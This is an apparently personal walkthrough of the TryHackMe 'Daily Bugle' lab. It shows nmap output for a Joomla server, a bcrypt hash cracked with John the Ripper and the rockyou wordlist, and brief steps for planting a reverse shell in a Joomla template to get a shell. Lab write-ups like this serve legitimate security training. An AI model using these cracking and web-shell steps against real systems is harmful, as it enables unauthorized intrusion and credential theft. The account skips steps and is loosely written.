THM-dailybugle

┌──(root㉿kali)-[/home/kali/tryhackme/dailybugle]
└─# cat 1.nmap 
# Nmap 7.95 scan initiated Tue Nov 18 21:22:40 2025 as: /usr/lib/nmap/nmap -sC -sV -vv -oA 1 10.10.125.50
Nmap scan report for 10.10.125.50
Host is up, received echo-reply ttl 63 (0.47s latency).
Scanned at 2025-11-18 21:22:41 UTC for 215s
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 7.4 (protocol 2.0)
80/tcp   open  http    syn-ack ttl 63 Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
| http-robots.txt: 15 disallowed entries 
| /joomla/administrator/ /administrator/ /bin/ /cache/ 
| /cli/ /components/ /includes/ /installation/ /language/ 
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
| http-methods: 
|_  Supported Methods: HEAD
3306/tcp open  mysql   syn-ack ttl 63 MariaDB 10.3.23 or earlier (unauthorized)

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Nov 18 21:26:16 2025 -- 1 IP address (1 host up) scanned in 215.91 seconds

i was looking for a specific amount of the servers present there .........

but this was not what i meant to get /./

then i tried for the password and i sucessfully got a hash ;)

┌──(root㉿kali)-[/home/kali/tryhackme/dailybugle] └─# echo '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm' > hash.txt

┌──(root㉿kali)-[/home/kali/tryhackme/dailybugle] └─# john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Using default input encoding: UTF-8 Loaded 1 password hash (bcrypt [Blowfish 32/64 X3]) Cost 1 (iteration count) is 1024 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status 0g 0:00:03:33 0.11% (ETA: 2025-11-22 02:18) 0g/s 90.09p/s 90.09c/s 90.09C/s lolada..hafizah 0g 0:00:04:55 0.15% (ETA: 2025-11-22 02:06) 0g/s 90.75p/s 90.75c/s 90.75C/s puerta..mockingbird 0g 0:00:07:09 0.23% (ETA: 2025-11-22 01:01) 0g/s 92.83p/s 92.83c/s 92.83C/s sunshine...sexyrexy spiderman123 (?) 1g 0:00:08:21 DONE (2025-11-19 21:20) 0.001995g/s 93.45p/s 93.45c/s 93.45C/s thelma1..speciala Use the "--show" option to display all of the cracked passwords reliably Session completed.

┌──(root㉿kali)-[/home/kali/tryhackme/dailybugle] └─#

save the rev shell code and do change the lhost and lport and start the listen on the machine.......

just click on the template preview after saving it /././././././././.

boom got the shell

Last updated

Was this helpful?